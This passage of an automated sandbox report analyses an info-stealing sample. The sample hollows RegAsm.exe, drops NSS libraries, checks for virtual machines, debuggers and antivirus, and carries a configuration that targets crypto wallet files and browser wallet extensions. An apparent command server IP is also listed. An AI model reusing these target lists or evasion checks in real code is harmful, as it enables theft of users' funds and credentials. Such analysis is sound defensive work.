                      Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A115 push ecx; ret 3_2_0041A128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B536 push ecx; ret 3_2_6C70B549
                      Source: file.exeStatic PE information: section name: .text entropy: 7.97607995169573
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR
                      Source: c:\users\user\desktop\file.exeEvent Logs and Signature results: Application crash and keyboard check
                      Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                      Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                      Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 4EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.7 %
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410220 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410352h3_2_00410220
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_00416310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004173B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00416B50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040AF10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00416FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00416750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004103F0 GetSystemInfo,wsprintfA,3_2_004103F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: Amcache.hve.6.drBinary or memory string: VMware
                      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1976459689.000000000161D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware8[6
                      Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-77609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041A2BF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004181D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004181D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410050 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,3_2_00410050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041F398 SetUnhandledExceptionFilter,3_2_0041F398
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041B7E7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041B7E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C70B66C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C70B1F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C92AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C92AC62
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: file.exe, Angelo.csReference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
                      Source: file.exe, Angelo.csReference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "VirtualProtectEx")
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02EC2111 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02EC2111
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411A90 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_00411A90
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1175008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B341 cpuid 3_2_6C70B341
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410220
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,LocalFree,3_2_00410299
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410150 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,3_2_00410150
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004100D0 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_004100D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004101B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_004101B0
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth 
